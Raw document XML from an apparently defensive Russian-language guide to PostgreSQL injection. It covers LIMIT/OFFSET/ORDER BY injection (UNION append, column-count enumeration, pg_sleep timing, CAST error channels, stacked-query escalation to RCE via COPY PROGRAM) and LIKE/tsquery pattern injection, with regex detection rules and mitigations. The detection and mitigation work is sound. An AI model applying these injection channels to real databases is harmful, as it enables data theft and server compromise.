              <w:t xml:space="preserve">:limit</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ORDER BY col_name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identifier-token (bind не работает)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stacked, append-UNION, Unicode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Enum + ORM ИЛИ whitelist + ASCII + quote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ORDER BY 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integer-literal (column-position)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error-канал column-count, stacked, expression-bypass через </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserv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int()</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Query(ge=1, le=N)</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ORDER BY (expr)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arbitrary expression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row-order boolean, pg_sleep time, CAST error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decompose + validate + ORM-compose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Хук для rules.py: класс LIMIT_ORDER_INJECTION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># rules.py фрагмент — детекция injection в LIMIT/OFFSET/ORDER BY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">import re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LIMIT_ORDER_INJECTION_PATTERNS = [</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.14.1: f-string / concat в LIMIT/OFFSET</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"\bLIMIT\s+\{[a-z_][a-z0-9_]*\}", re.IGNORECASE),       # f"LIMIT {var}"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"\bLIMIT\s+['\"]\s*\+\s*\w+", re.IGNORECASE),           # "LIMIT " + var</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"\bOFFSET\s+\{[a-z_][a-z0-9_]*\}", re.IGNORECASE),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3.14.2: f-string / concat в ORDER BY с identifier</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"\bORDER\s+BY\s+\{[a-z_][a-z0-9_]*\}", re.IGNORECASE),  # f"ORDER BY {sort}"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"\bORDER\s+BY\s+['\"]\s*\+\s*\w+", re.IGNORECASE),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3.14.4: subquery / CASE / pg_sleep в ORDER BY (runtime-сигнал)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"\bORDER\s+BY\s*\(\s*(CASE|SELECT|pg_sleep)", re.IGNORECASE),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3.14.3: ORDER BY с большим integer от endpoint (runtime-сигнал)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"\bORDER\s+BY\s+\d{3,}\b", re.IGNORECASE),              # ORDER BY 99+</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LIMIT_ORDER_SIGNATURES = [</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # runtime: PG-сторона</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "ORDER BY position .* is not in select list",   # column-count enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "cannot insert multiple commands into a prepared statement",  # stacked attempt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LIMIT_ORDER_RISK = 7   # high — direct UNION/RCE-канал при сочетании с 3.5/3.7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Эти patterns ловят statically-detectable варианты на code-review. Runtime-signal через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анализ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">query</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-поля для production-детекции.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Перекрёстные ссылки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основной канал извлечения для 3.14.1 (LIMIT-append UNION) и 3.14.3 (column-count enumeration → UNION).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via CAST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — error-канал в 3.14.3 (column-position error) и 3.14.4 (CAST в ORDER BY-subquery).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3.14.4 (row-order boolean) — нативный boolean-channel через ORDER BY.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Time-based blind</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 3.14.4 (pg_sleep в expression) — time-channel через ORDER BY-evaluation.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driver-mode определяет, проходит ли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-payload в 3.14.1/3.14.2/3.14.3.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 PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — escalation в RCE через stacked queries (3.14.3 Variant B).</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серверная сторона identifier-injection (зеркало 3.14.2 для plpgsql functions).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общие шаблоны: type-coercion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whitelist через Enum, decompose-validate-rebuild для sort-spec.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Managed-провайдеры (RDS, Cloud SQL, Supabase)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Все четыре подраздела 3.14 — application-level mis-configurations, не зависящие от server-side privileges. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Managed-провайдеры не меняют картину</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AWS RDS / Aurora PostgreSQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: одинаковое поведение со self-hosted.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доступен в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">rdsadmin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-предоставленном виде, что упрощает runtime-детекцию.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Google Cloud SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: то же;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включается через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cloudsql.enable_pg_stat_statements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Supabase</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: PostgREST на стороне API делает свой parsing запросов, но если приложение строит SQL через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">rpc()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с f-string в text — векторы 3.14 работают идентично.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Azure Database for PostgreSQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: то же поведение; нет provider-specific mitigation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Provider-mitigation отсутствует</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — защита целиком application-level. Единственный provider-feature, релевантный к 3.14 — query-anomaly detection в RDS Performance Insights / Cloud SQL Insights, который может пометить </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY (CASE ...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> от endpoint, где обычно простой sort.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.15.0 Обзор</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Injection в LIKE и tsquery</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — класс уязвимостей, где пользовательский ввод попадает в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">pattern-семантику</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (LIKE-wildcards) или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">operator-language</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (tsquery), а не в обычную WHERE-сравнение. Это не классическая string-injection через кавычки — даже если ввод корректно escaped как SQL-литерал, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">сами символы внутри строки</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> имеют специальное значение для PostgreSQL pattern-парсера. Защита от обычной SQL-инъекции (bind-параметризация) не помогает: pattern-парсер всё равно интерпретирует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операторы.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.15 покрывает две независимые семантические поверхности:</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LIKE-семейство</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LIKE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ILIKE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SIMILAR TO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) — wildcards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(zero-or-more) и </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(any single char). Pattern идёт через обычный bind-параметр, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">символы внутри</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> интерпретируются движком как wildcards. Если приложение принимает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">search</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE name LIKE :search</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, payload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парсится как «всё, что содержит admin» — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не SQL injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, а </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">pattern matching attack</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tsquery-семейство</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phraseto_tsquery</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) — full-text search с собственным operator-языком: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(NOT), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;-&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (FOLLOWED BY),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(prefix).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наиболее опасная функция, потому что она </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">парсит operators</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">; payload может изменить boolean-логику запроса (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">admin &amp; true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
